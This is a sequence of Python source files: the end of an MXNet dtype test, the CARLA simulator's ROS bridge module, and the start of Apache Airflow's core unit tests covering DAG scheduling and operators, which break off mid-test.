def test_arange_like_dtype():
dtypes = [np.float16, np.float32, np.float64]
for t in dtypes:
x = mx.sym.Variable('x', dtype=t)
y = mx.sym.reshape(x, shape=(0, 0, -1))
z = mx.sym.contrib.arange_like(y, axis=-1)
mod = z.simple_bind(ctx=mx.gpu(0), x=(3, 4, 5, 6), grad_req='null')
mod.arg_arrays[0][:] = np.random.normal(size=mod.arg_arrays[0].shape).astype(t)
out = mod.forward(is_train=False)
for v in out:
assert v.dtype == t
if __name__ == '__main__':
import nose
nose.runmodule()
|
bridge.py
|
#!/usr/bin/env python
#
# Copyright (c) 2018-2020 Intel Corporation
#
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
#
"""
Rosbridge class:
Class that handles the communication between CARLA and ROS
"""
try:
import queue
except ImportError:
import Queue as queue
import sys
from distutils.version import LooseVersion
from threading import Thread, Lock, Event
import pkg_resources
import rospy
import carla
from carla_ros_bridge.actor import Actor
from carla_ros_bridge.communication import Communication
from carla_ros_bridge.sensor import Sensor
from carla_ros_bridge.carla_status_publisher import CarlaStatusPublisher
from carla_ros_bridge.world_info import WorldInfo
from carla_ros_bridge.spectator import Spectator
from carla_ros_bridge.traffic import Traffic, TrafficLight
from carla_ros_bridge.vehicle import Vehicle
from carla_ros_bridge.lidar import Lidar
from carla_ros_bridge.radar import Radar
from carla_ros_bridge.gnss import Gnss
from carla_ros_bridge.imu import ImuSensor
from carla_ros_bridge.ego_vehicle import EgoVehicle
from carla_ros_bridge.collision_sensor import CollisionSensor
from carla_ros_bridge.lane_invasion_sensor import LaneInvasionSensor
from carla_ros_bridge.camera import Camera, RgbCamera, DepthCamera, SemanticSegmentationCamera
from carla_ros_bridge.object_sensor import ObjectSensor
from carla_ros_bridge.rss_sensor import RssSensor
from carla_ros_bridge.walker import Walker
from carla_ros_bridge.debug_helper import DebugHelper
from carla_ros_bridge.traffic_lights_sensor import TrafficLightsSensor
from carla_msgs.msg import CarlaActorList, CarlaActorInfo, CarlaControl, CarlaWeatherParameters
class CarlaRosBridge(object):
"""
Carla Ros bridge
"""
CARLA_VERSION = "0.9.9"
def __init__(self, carla_world, params):
"""
Constructor
:param carla_world: carla world object
:type carla_world: carla.World
:param params: dict of parameters, see settings.yaml
:type params: dict
"""
self.parameters = params
self.actors = {}
self.pseudo_actors = []
self.carla_world = carla_world
self.synchronous_mode_update_thread = None
self.shutdown = Event()
# set carla world settings
self.carla_settings = carla_world.get_settings()
# workaround: settings can only be applied while not in synchronous mode
if self.carla_settings.synchronous_mode:
self.carla_settings.synchronous_mode = False
carla_world.apply_settings(self.carla_settings)
rospy.loginfo("synchronous_mode: {}".format(
self.parameters["synchronous_mode"]))
self.carla_settings.synchronous_mode = self.parameters["synchronous_mode"]
rospy.loginfo("fixed_delta_seconds: {}".format(
self.parameters["fixed_delta_seconds"]))
self.carla_settings.fixed_delta_seconds = self.parameters["fixed_delta_seconds"]
carla_world.apply_settings(self.carla_settings)
self.comm = Communication()
self.update_lock = Lock()
self.carla_control_queue = queue.Queue()
self.status_publisher = CarlaStatusPublisher(
self.carla_settings.synchronous_mode,
self.carla_settings.fixed_delta_seconds)
# In synchronous mode the bridge waits for control commands from the ego vehicles;
# their ids are maintained in a list.
# Before tick(), the list is filled and the loop waits until it is empty.
self._all_vehicle_control_commands_received = Event()
self._expected_ego_vehicle_control_command_ids = []
self._expected_ego_vehicle_control_command_ids_lock = Lock()
if self.carla_settings.synchronous_mode:
self.carla_run_state = CarlaControl.PLAY
self.carla_control_subscriber = \
rospy.Subscriber("/carla/control", CarlaControl,
lambda control: self.carla_control_queue.put(control.command))
self.synchronous_mode_update_thread = Thread(
target=self._synchronous_mode_update)
self.synchronous_mode_update_thread.start()
else:
self.timestamp_last_run = 0.0
self.update_actors_queue = queue.Queue(maxsize=1)
# start thread to update actors
self.update_actor_thread = Thread(
target=self._update_actors_thread)
self.update_actor_thread.start()
# create initially existing actors
self.update_actors_queue.put(
set([x.id for x in self.carla_world.get_snapshot()]))
# wait for the initial actor creation to finish
self.update_actors_queue.join()
# register callback to update actors
self.on_tick_id = self.carla_world.on_tick(self._carla_time_tick)
self.carla_weather_subscriber = \
rospy.Subscriber("/carla/weather_control",
CarlaWeatherParameters, self.on_weather_changed)
# add world info
self.pseudo_actors.append(WorldInfo(carla_world=self.carla_world,
communication=self.comm))
# add global object sensor
self.pseudo_actors.append(ObjectSensor(parent=None,
communication=self.comm,
actor_list=self.actors,
filtered_id=None))
self.debug_helper = DebugHelper(carla_world.debug)
# add traffic light pseudo sensor
self.pseudo_actors.append(TrafficLightsSensor(parent=None,
communication=self.comm,
actor_list=self.actors))
def destroy(self):
"""
Function to destroy this object.
:return:
"""
rospy.signal_shutdown("")
self.debug_helper.destroy()
self.shutdown.set()
self.carla_weather_subscriber.unregister()
self.carla_control_queue.put(CarlaControl.STEP_ONCE)
if not self.carla_settings.synchronous_mode:
if self.on_tick_id:
self.carla_world.remove_on_tick(self.on_tick_id)
self.update_actor_thread.join()
self._update_actors(set())
rospy.loginfo("Exiting Bridge")
def on_weather_changed(self, weather_parameters):
"""
Callback on new weather parameters
:return:
"""
if not self.carla_world:
return
rospy.loginfo("Applying weather parameters...")
weather = carla.WeatherParameters()
weather.cloudiness = weather_parameters.cloudiness
weather.precipitation = weather_parameters.precipitation
weather.precipitation_deposits = weather_parameters.precipitation_deposits
weather.wind_intensity = weather_parameters.wind_intensity
weather.fog_density = weather_parameters.fog_density
weather.fog_distance = weather_parameters.fog_distance
weather.wetness = weather_parameters.wetness
weather.sun_azimuth_angle = weather_parameters.sun_azimuth_angle
weather.sun_altitude_angle = weather_parameters.sun_altitude_angle
self.carla_world.set_weather(weather)
def process_run_state(self):
"""
Process pending run state changes (PLAY, PAUSE, STEP_ONCE) from the control queue
"""
command = None
# get last command
while not self.carla_control_queue.empty():
command = self.carla_control_queue.get()
while command is not None and not rospy.is_shutdown():
self.carla_run_state = command
if self.carla_run_state == CarlaControl.PAUSE:
# wait for next command
rospy.loginfo("State set to PAUSED")
self.status_publisher.set_synchronous_mode_running(False)
command = self.carla_control_queue.get()
elif self.carla_run_state == CarlaControl.PLAY:
rospy.loginfo("State set to PLAY")
self.status_publisher.set_synchronous_mode_running(True)
return
elif self.carla_run_state == CarlaControl.STEP_ONCE:
rospy.loginfo("Execute single step.")
self.status_publisher.set_synchronous_mode_running(True)
self.carla_control_queue.put(CarlaControl.PAUSE)
return
def _synchronous_mode_update(self):
"""
execution loop for synchronous mode
"""
while not self.shutdown.is_set():
self.process_run_state()
if self.parameters['synchronous_mode_wait_for_vehicle_control_command']:
# fill list of available ego vehicles
self._expected_ego_vehicle_control_command_ids = []
with self._expected_ego_vehicle_control_command_ids_lock:
for actor_id, actor in self.actors.items():
if isinstance(actor, EgoVehicle):
self._expected_ego_vehicle_control_command_ids.append(
actor_id)
frame = self.carla_world.tick()
world_snapshot = self.carla_world.get_snapshot()
self.status_publisher.set_frame(frame)
self.comm.update_clock(world_snapshot.timestamp)
rospy.logdebug("Tick for frame {} returned. Waiting for sensor data...".format(
frame))
self._update(frame, world_snapshot.timestamp.elapsed_seconds)
rospy.logdebug("Waiting for sensor data finished.")
self.comm.send_msgs()
self._update_actors(set([x.id for x in world_snapshot]))
if self.parameters['synchronous_mode_wait_for_vehicle_control_command']:
# wait for all ego vehicles to send a vehicle control command
if self._expected_ego_vehicle_control_command_ids:
if not self._all_vehicle_control_commands_received.wait(1):
rospy.logwarn("Timeout (1s) while waiting for vehicle control commands. "
"Missing command from actor ids {}".format(
self._expected_ego_vehicle_control_command_ids))
self._all_vehicle_control_commands_received.clear()
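# One synchronous-mode iteration above: process pending PLAY/PAUSE/STEP_ONCE commands,
# optionally record which ego vehicles a control command is expected from, tick the CARLA
# world, publish clock, status and sensor data for the returned frame, refresh the actor
# list from the snapshot and, if configured, wait (with a 1 s timeout) until all expected
# vehicle control commands have been received.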
def _carla_time_tick(self, carla_snapshot):
"""
Private callback registered at carla.World.on_tick()
to trigger cyclic updates.
After successfully locking the update mutex
(only a trylock is performed to respect the bridge processing time)
the clock and the children are updated.
Finally the ROS messages collected for publishing are sent out.
:param carla_snapshot: the current carla world snapshot
:type carla_snapshot: carla.WorldSnapshot
:return:
"""
if not self.shutdown.is_set():
if self.update_lock.acquire(False):
if self.timestamp_last_run < carla_snapshot.timestamp.elapsed_seconds:
self.timestamp_last_run = carla_snapshot.timestamp.elapsed_seconds
self.comm.update_clock(carla_snapshot.timestamp)
self.status_publisher.set_frame(carla_snapshot.frame)
self._update(carla_snapshot.frame,
carla_snapshot.timestamp.elapsed_seconds)
self.comm.send_msgs()
self.update_lock.release()
# if possible push current snapshot to update-actors-thread
try:
self.update_actors_queue.put_nowait(
set([x.id for x in carla_snapshot]))
except queue.Full:
pass
def _update_actors_thread(self):
"""
execution loop for async mode actor list updates
"""
while not self.shutdown.is_set():
try:
current_actors = self.update_actors_queue.get(timeout=1)
if current_actors:
self._update_actors(current_actors)
self.update_actors_queue.task_done()
except queue.Empty:
pass
def _update_actors(self, current_actors):
"""
update the available actors
"""
previous_actors = set(self.actors)
new_actors = current_actors - previous_actors
deleted_actors = previous_actors - current_actors
if new_actors:
for carla_actor in self.carla_world.get_actors(list(new_actors)):
self._create_actor(carla_actor)
if deleted_actors:
for id_to_delete in deleted_actors:
# remove actor
actor = self.actors[id_to_delete]
with self.update_lock:
rospy.loginfo("Remove {}(id={}, parent_id={}, prefix={})".format(
actor.__class__.__name__, actor.get_id(),
actor.get_parent_id(),
actor.get_prefix()))
actor.destroy()
del self.actors[id_to_delete]
# remove pseudo-actors that have this actor as their parent
updated_pseudo_actors = []
for pseudo_actor in self.pseudo_actors:
if pseudo_actor.get_parent_id() == id_to_delete:
rospy.loginfo("Remove {}(parent_id={}, prefix={})".format(
pseudo_actor.__class__.__name__,
pseudo_actor.get_parent_id(),
pseudo_actor.get_prefix()))
pseudo_actor.destroy()
del pseudo_actor
else:
updated_pseudo_actors.append(pseudo_actor)
self.pseudo_actors = updated_pseudo_actors
# publish actor list on change
if new_actors or deleted_actors:
self.publish_actor_list()
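# Actor bookkeeping above is a plain set difference: ids present in the snapshot but not
# yet tracked are created, ids that disappeared are destroyed together with any pseudo
# sensors parented to them, and the ROS actor list is re-published whenever either set is
# non-empty.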
def publish_actor_list(self):
"""
publish list of carla actors
:return:
"""
ros_actor_list = CarlaActorList()
for actor_id in self.actors:
actor = self.actors[actor_id].carla_actor
ros_actor = CarlaActorInfo()
ros_actor.id = actor.id
ros_actor.type = actor.type_id
try:
ros_actor.rolename = str(actor.attributes.get('role_name'))
except ValueError:
pass
if actor.parent:
ros_actor.parent_id = actor.parent.id
else:
ros_actor.parent_id = 0
ros_actor_list.actors.append(ros_actor)
self.comm.publish_message(
"/carla/actor_list", ros_actor_list, is_latched=True)
def _create_actor(self, carla_actor): # pylint: disable=too-many-branches,too-many-statements
"""
create an actor
"""
parent = None
if carla_actor.parent:
if carla_actor.parent.id in self.actors:
parent = self.actors[carla_actor.parent.id]
else:
parent = self._create_actor(carla_actor.parent)
actor = None
pseudo_actors = []
if carla_actor.type_id.startswith('traffic'):
if carla_actor.type_id == "traffic.traffic_light":
actor = TrafficLight(carla_actor, parent, self.comm)
else:
actor = Traffic(carla_actor, parent, self.comm)
elif carla_actor.type_id.startswith("vehicle"):
if carla_actor.attributes.get('role_name')\
in self.parameters['ego_vehicle']['role_name']:
actor = EgoVehicle(
carla_actor, parent, self.comm, self._ego_vehicle_control_applied_callback)
pseudo_actors.append(ObjectSensor(parent=actor,
communication=self.comm,
actor_list=self.actors,
filtered_id=carla_actor.id))
else:
actor = Vehicle(carla_actor, parent, self.comm)
elif carla_actor.type_id.startswith("sensor"):
if carla_actor.type_id.startswith("sensor.camera"):
if carla_actor.type_id.startswith("sensor.camera.rgb"):
actor = RgbCamera(
carla_actor, parent, self.comm, self.carla_settings.synchronous_mode)
elif carla_actor.type_id.startswith("sensor.camera.depth"):
actor = DepthCamera(
carla_actor, parent, self.comm, self.carla_settings.synchronous_mode)
elif carla_actor.type_id.startswith("sensor.camera.semantic_segmentation"):
actor = SemanticSegmentationCamera(
carla_actor, parent, self.comm, self.carla_settings.synchronous_mode)
else:
actor = Camera(
carla_actor, parent, self.comm, self.carla_settings.synchronous_mode)
elif carla_actor.type_id.startswith("sensor.lidar"):
actor = Lidar(carla_actor, parent, self.comm,
self.carla_settings.synchronous_mode)
elif carla_actor.type_id.startswith("sensor.other.radar"):
actor = Radar(carla_actor, parent, self.comm,
self.carla_settings.synchronous_mode)
elif carla_actor.type_id.startswith("sensor.other.gnss"):
actor = Gnss(carla_actor, parent, self.comm,
self.carla_settings.synchronous_mode)
elif carla_actor.type_id.startswith("sensor.other.imu"):
actor = ImuSensor(
carla_actor, parent, self.comm, self.carla_settings.synchronous_mode)
elif carla_actor.type_id.startswith("sensor.other.collision"):
actor = CollisionSensor(
carla_actor, parent, self.comm, self.carla_settings.synchronous_mode)
elif carla_actor.type_id.startswith("sensor.other.rss"):
actor = RssSensor(
carla_actor, parent, self.comm, self.carla_settings.synchronous_mode)
elif carla_actor.type_id.startswith("sensor.other.lane_invasion"):
actor = LaneInvasionSensor(
carla_actor, parent, self.comm, self.carla_settings.synchronous_mode)
else:
actor = Sensor(carla_actor, parent, self.comm,
self.carla_settings.synchronous_mode)
elif carla_actor.type_id.startswith("spectator"):
actor = Spectator(carla_actor, parent, self.comm)
elif carla_actor.type_id.startswith("walker"):
actor = Walker(carla_actor, parent, self.comm)
else:
actor = Actor(carla_actor, parent, self.comm)
rospy.loginfo("Created {}(id={}, parent_id={},"
" type={}, prefix={}, attributes={})".format(
actor.__class__.__name__, actor.get_id(),
actor.get_parent_id(), carla_actor.type_id,
actor.get_prefix(), carla_actor.attributes))
with self.update_lock:
self.actors[carla_actor.id] = actor
for pseudo_actor in pseudo_actors:
rospy.loginfo("Created {}(parent_id={}, prefix={})".format(
pseudo_actor.__class__.__name__,
pseudo_actor.get_parent_id(),
pseudo_actor.get_prefix()))
with self.update_lock:
self.pseudo_actors.append(pseudo_actor)
return actor
def run(self):
"""
Run the bridge functionality.
Registers on shutdown callback at rospy and spins ROS.
:return:
"""
rospy.on_shutdown(self.on_shutdown)
rospy.spin()
def on_shutdown(self):
"""
Function to be called on shutdown.
This function is registered at rospy as shutdown handler.
"""
rospy.loginfo("Shutdown requested")
self.destroy()
def _update(self, frame_id, timestamp):
"""
update all actors
:return:
"""
# update all pseudo actors
for actor in self.pseudo_actors:
actor.update(frame_id, timestamp)
# update all carla actors
for actor_id in self.actors:
try:
self.actors[actor_id].update(frame_id, timestamp)
except RuntimeError as e:
rospy.logwarn("Update actor {}({}) failed: {}".format(
self.actors[actor_id].__class__.__name__, actor_id, e))
continue
def _ego_vehicle_control_applied_callback(self, ego_vehicle_id):
if not self.carla_settings.synchronous_mode or \
not self.parameters['synchronous_mode_wait_for_vehicle_control_command']:
return
with self._expected_ego_vehicle_control_command_ids_lock:
if ego_vehicle_id in self._expected_ego_vehicle_control_command_ids:
self._expected_ego_vehicle_control_command_ids.remove(
ego_vehicle_id)
else:
rospy.logwarn(
"Unexpected vehicle control command received from {}".format(ego_vehicle_id))
if not self._expected_ego_vehicle_control_command_ids:
self._all_vehicle_control_commands_received.set()
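# This callback completes the synchronous-mode handshake: every ego vehicle reports here
# once its control command has been applied, its id is removed from the expected list and,
# when the list is empty, the event above unblocks _synchronous_mode_update() so the next
# world tick can be issued.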
def main():
"""
main function for the carla simulator ROS bridge,
maintaining the communication client and the CarlaRosBridge object
"""
rospy.init_node("carla_bridge", anonymous=True)
parameters = rospy.get_param('carla')
rospy.loginfo("Trying to connect to {host}:{port}".format(
host=parameters['host'], port=parameters['port']))
carla_bridge = None
carla_world = None
carla_client = None
try:
carla_client = carla.Client(
host=parameters['host'],
port=parameters['port'])
carla_client.set_timeout(parameters['timeout'])
# check carla version
dist = pkg_resources.get_distribution("carla")
if LooseVersion(dist.version) < LooseVersion(CarlaRosBridge.CARLA_VERSION):
rospy.logfatal("CARLA python module version {} required. Found: {}".format(
CarlaRosBridge.CARLA_VERSION, dist.version))
sys.exit(1)
if LooseVersion(carla_client.get_server_version()) < \
LooseVersion(CarlaRosBridge.CARLA_VERSION):
rospy.logfatal("CARLA Server version {} required. Found: {}".format(
CarlaRosBridge.CARLA_VERSION, carla_client.get_server_version()))
sys.exit(1)
carla_world = carla_client.get_world()
if "town" in parameters:
if parameters["town"].endswith(".xodr"):
rospy.loginfo(
"Loading opendrive world from file '{}'".format(parameters["town"]))
with open(parameters["town"]) as od_file:
data = od_file.read()
carla_world = carla_client.generate_opendrive_world(str(data))
else:
if carla_world.get_map().name != parameters["town"]:
rospy.loginfo("Loading town '{}' (previous: '{}').".format(
parameters["town"], carla_world.get_map().name))
carla_world = carla_client.load_world(parameters["town"])
carla_world.tick()
carla_bridge = CarlaRosBridge(carla_client.get_world(), parameters)
carla_bridge.run()
except (IOError, RuntimeError) as e:
rospy.logerr("Error: {}".format(e))
finally:
del carla_world
del carla_client
if __name__ == "__main__":
main()
|
core.py
|
# -*- coding: utf-8 -*-
#
# Licensed to the Apache Software Foundation (ASF) under one
# or more contributor license agreements. See the NOTICE file
# distributed with this work for additional information
# regarding copyright ownership. The ASF licenses this file
# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
from __future__ import print_function
import json
import unittest
import bleach
import doctest
import mock
import multiprocessing
import os
import re
import signal
import sqlalchemy
import subprocess
import tempfile
import warnings
from datetime import timedelta
from dateutil.relativedelta import relativedelta
from email.mime.application import MIMEApplication
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from numpy.testing import assert_array_almost_equal
from six.moves.urllib.parse import urlencode
from time import sleep
from airflow import configuration
from airflow.executors import SequentialExecutor
from airflow.models import Variable
from airflow import jobs, models, DAG, utils, macros, settings, exceptions
from airflow.models import BaseOperator
from airflow.operators.bash_operator import BashOperator
from airflow.operators.check_operator import CheckOperator, ValueCheckOperator
from airflow.operators.dagrun_operator import TriggerDagRunOperator
from airflow.operators.python_operator import PythonOperator
from airflow.operators.dummy_operator import DummyOperator
from airflow.hooks.base_hook import BaseHook
from airflow.hooks.sqlite_hook import SqliteHook
from airflow.bin import cli
from airflow.www import app as application
from airflow.settings import Session
from airflow.utils import timezone
from airflow.utils.timezone import datetime
from airflow.utils.state import State
from airflow.utils.dates import infer_time_unit, round_time, scale_time_units
from lxml import html
from airflow.exceptions import AirflowException
from airflow.configuration import AirflowConfigException, run_command
from jinja2.sandbox import SecurityError
from jinja2 import UndefinedError
from pendulum import utcnow
import six
NUM_EXAMPLE_DAGS = 21
DEV_NULL = '/dev/null'
TEST_DAG_FOLDER = os.path.join(
os.path.dirname(os.path.realpath(__file__)), 'dags')
DEFAULT_DATE = datetime(2015, 1, 1)
DEFAULT_DATE_ISO = DEFAULT_DATE.isoformat()
DEFAULT_DATE_DS = DEFAULT_DATE_ISO[:10]
TEST_DAG_ID = 'unit_tests'
try:
import cPickle as pickle
except ImportError:
# Python 3
import pickle
def reset(dag_id=TEST_DAG_ID):
session = Session()
tis = session.query(models.TaskInstance).filter_by(dag_id=dag_id)
tis.delete()
session.commit()
session.close()
configuration.conf.load_test_config()
reset()
class OperatorSubclass(BaseOperator):
"""
An operator to test template substitution
"""
template_fields = ['some_templated_field']
def __init__(self, some_templated_field, *args, **kwargs):
super(OperatorSubclass, self).__init__(*args, **kwargs)
self.some_templated_field = some_templated_field
def execute(self, *args, **kwargs):
pass
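# A minimal usage sketch for the operator above (illustrative only, not part of the test
# suite): fields listed in template_fields are rendered with Jinja before execute() runs,
# so OperatorSubclass(task_id='templated_task', some_templated_field='{{ ds }}', dag=dag)
# would see the rendered execution date string in self.some_templated_field at runtime.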
class CoreTest(unittest.TestCase):
default_scheduler_args = {"num_runs": 1}
def setUp(self):
configuration.conf.load_test_config()
self.dagbag = models.DagBag(
dag_folder=DEV_NULL, include_examples=True)
self.args = {'owner': 'airflow', 'start_date': DEFAULT_DATE}
self.dag = DAG(TEST_DAG_ID, default_args=self.args)
self.dag_bash = self.dagbag.dags['example_bash_operator']
self.runme_0 = self.dag_bash.get_task('runme_0')
self.run_after_loop = self.dag_bash.get_task('run_after_loop')
self.run_this_last = self.dag_bash.get_task('run_this_last')
def test_schedule_dag_no_previous_runs(self):
"""
Tests scheduling a dag with no previous runs
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_previous_runs')
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag.clear()
def test_schedule_dag_relativedelta(self):
"""
Tests scheduling a dag with a relativedelta schedule_interval
"""
delta = relativedelta(hours=+1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_relativedelta',
schedule_interval=delta)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0),
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run2)
self.assertEqual(dag.dag_id, dag_run2.dag_id)
self.assertIsNotNone(dag_run2.run_id)
self.assertNotEqual('', dag_run2.run_id)
self.assertEqual(
datetime(2015, 1, 2, 0, 0) + delta,
dag_run2.execution_date,
msg='dag_run2.execution_date did not match expectation: {0}'
.format(dag_run2.execution_date)
)
self.assertEqual(State.RUNNING, dag_run2.state)
self.assertFalse(dag_run2.external_trigger)
dag.clear()
def test_schedule_dag_fake_scheduled_previous(self):
"""
Test scheduling a dag where there is a prior DagRun
which has the same run_id as the next run should have
"""
delta = timedelta(hours=1)
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_fake_scheduled_previous',
schedule_interval=delta,
start_date=DEFAULT_DATE)
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=DEFAULT_DATE))
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
dag.create_dagrun(run_id=models.DagRun.id_for_date(DEFAULT_DATE),
execution_date=DEFAULT_DATE,
state=State.SUCCESS,
external_trigger=True)
dag_run = scheduler.create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertEqual(dag.dag_id, dag_run.dag_id)
self.assertIsNotNone(dag_run.run_id)
self.assertNotEqual('', dag_run.run_id)
self.assertEqual(
DEFAULT_DATE + delta,
dag_run.execution_date,
msg='dag_run.execution_date did not match expectation: {0}'
.format(dag_run.execution_date)
)
self.assertEqual(State.RUNNING, dag_run.state)
self.assertFalse(dag_run.external_trigger)
def test_schedule_dag_once(self):
"""
        Tests scheduling a dag with an '@once' schedule_interval: a run should be
        created the first time create_dag_run is called, and not the second.
"""
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_once')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
dag_run = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
dag_run2 = jobs.SchedulerJob(**self.default_scheduler_args).create_dag_run(dag)
self.assertIsNotNone(dag_run)
self.assertIsNone(dag_run2)
dag.clear()
def test_fractional_seconds(self):
"""
Tests if fractional seconds are stored in the database
"""
dag = DAG(TEST_DAG_ID + 'test_fractional_seconds')
dag.schedule_interval = '@once'
dag.add_task(models.BaseOperator(
task_id="faketastic",
owner='Also fake',
start_date=datetime(2015, 1, 2, 0, 0)))
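        # timezone.utcnow() carries microseconds; the round trip below checks that they
        # survive being written to and read back from the metadata database.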
start_date = timezone.utcnow()
run = dag.create_dagrun(
run_id='test_' + start_date.isoformat(),
execution_date=start_date,
start_date=start_date,
state=State.RUNNING,
external_trigger=False
)
run.refresh_from_db()
self.assertEqual(start_date, run.execution_date,
"dag run execution_date loses precision")
self.assertEqual(start_date, run.start_date,
"dag run start_date loses precision ")
def test_schedule_dag_start_end_dates(self):
"""
Tests that an attempt to schedule a task after the Dag's end_date
does not succeed.
"""
delta = timedelta(hours=1)
runs = 3
start_date = DEFAULT_DATE
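        # With (runs - 1) intervals between start_date and end_date, exactly `runs`
        # dag runs fit inside the schedulable window.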
end_date = start_date + (runs - 1) * delta
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_start_end_dates',
start_date=start_date,
end_date=end_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
# Create and schedule the dag runs
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_runs.append(scheduler.create_dag_run(dag))
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_schedule_dag_no_end_date_up_to_today_only(self):
"""
Tests that a Dag created without an end_date can only be scheduled up
to and including the current datetime.
For example, if today is 2016-01-01 and we are scheduling from a
        start_date of 2015-01-01, only runs up to, but not including,
        2016-01-01 should be scheduled.
"""
session = settings.Session()
delta = timedelta(days=1)
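        # utcnow() here returns a pendulum-style datetime (note .subtract below), so the
        # loop expects one run per day for the past week.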
now = utcnow()
start_date = now.subtract(weeks=1)
runs = (now - start_date).days
dag = DAG(TEST_DAG_ID + 'test_schedule_dag_no_end_date_up_to_today_only',
start_date=start_date,
schedule_interval=delta)
dag.add_task(models.BaseOperator(task_id='faketastic',
owner='Also fake'))
dag_runs = []
scheduler = jobs.SchedulerJob(**self.default_scheduler_args)
for i in range(runs):
dag_run = scheduler.create_dag_run(dag)
dag_runs.append(dag_run)
# Mark the DagRun as complete
dag_run.state = State.SUCCESS
session.merge(dag_run)
session.commit()
# Attempt to schedule an additional dag run (for 2016-01-01)
additional_dag_run = scheduler.create_dag_run(dag)
for dag_run in dag_runs:
self.assertIsNotNone(dag_run)
self.assertIsNone(additional_dag_run)
def test_confirm_unittest_mod(self):
self.assertTrue(configuration.conf.get('core', 'unit_test_mode'))
def test_pickling(self):
dp = self.dag.pickle()
self.assertEqual(dp.pickle.dag_id, self.dag.dag_id)
def test_rich_comparison_ops(self):
class DAGsubclass(DAG):
pass
dag_eq = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_load_time = DAG(TEST_DAG_ID, default_args=self.args)
dag_diff_name = DAG(TEST_DAG_ID + '_neq', default_args=self.args)
dag_subclass = DAGsubclass(TEST_DAG_ID, default_args=self.args)
dag_subclass_diff_name = DAGsubclass(
TEST_DAG_ID + '2', default_args=self.args)
for d in [dag_eq, dag_diff_name, dag_subclass, dag_subclass_diff_name]:
d.last_loaded = self.dag.last_loaded
# test identity equality
self.assertEqual(self.dag, self.dag)
# test dag (in)equality based on _comps
self.assertEqual(dag_eq, self.dag)
self.assertNotEqual(dag_diff_name, self.dag)
self.assertNotEqual(dag_diff_load_time, self.dag)
# test dag inequality based on type even if _comps happen to match
self.assertNotEqual(dag_subclass, self.dag)
# a dag should equal an unpickled version of itself
d = pickle.dumps(self.dag)
self.assertEqual(pickle.loads(d), self.dag)
# dags are ordered based on dag_id no matter what the type is
self.assertLess(self.dag, dag_diff_name)
self.assertGreater(self.dag, dag_diff_load_time)
self.assertLess(self.dag, dag_subclass_diff_name)
# greater than should have been created automatically by functools
self.assertGreater(dag_diff_name, self.dag)
# hashes are non-random and match equality
self.assertEqual(hash(self.dag), hash(self.dag))
self.assertEqual(hash(dag_eq), hash(self.dag))
self.assertNotEqual(hash(dag_diff_name), hash(self.dag))
self.assertNotEqual(hash(dag_subclass), hash(self.dag))
def test_check_operators(self):
conn_id = "sqlite_default"
captainHook = BaseHook.get_hook(conn_id=conn_id)
captainHook.run("CREATE TABLE operator_test_table (a, b)")
captainHook.run("insert into operator_test_table values (1,2)")
t = CheckOperator(
task_id='check',
sql="select count(*) from operator_test_table",
conn_id=conn_id,
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
t = ValueCheckOperator(
task_id='value_check',
pass_value=95,
tolerance=0.1,
conn_id=conn_id,
sql="SELECT 100",
dag=self.dag)
t.run(start_date=DEFAULT_DATE, end_date=DEFAULT_DATE, ignore_ti_state=True)
captainHook.run("drop table operator_test_table")
def test_clear_api(self):
task = self.dag_bash.tasks[0]
task.clear(
start_date=DEFAULT_DATE, end_date=DEFAULT_DATE,
upstream=True, downstream=True)
ti = models.TaskInstance(task=task, execution_date=DEFAULT_DATE)
ti.are_dependents_done()
def test_illegal_args(self):
"""
Tests that Operators reject illegal arguments
"""
with warnings.catch_warnings(record=True) as w:
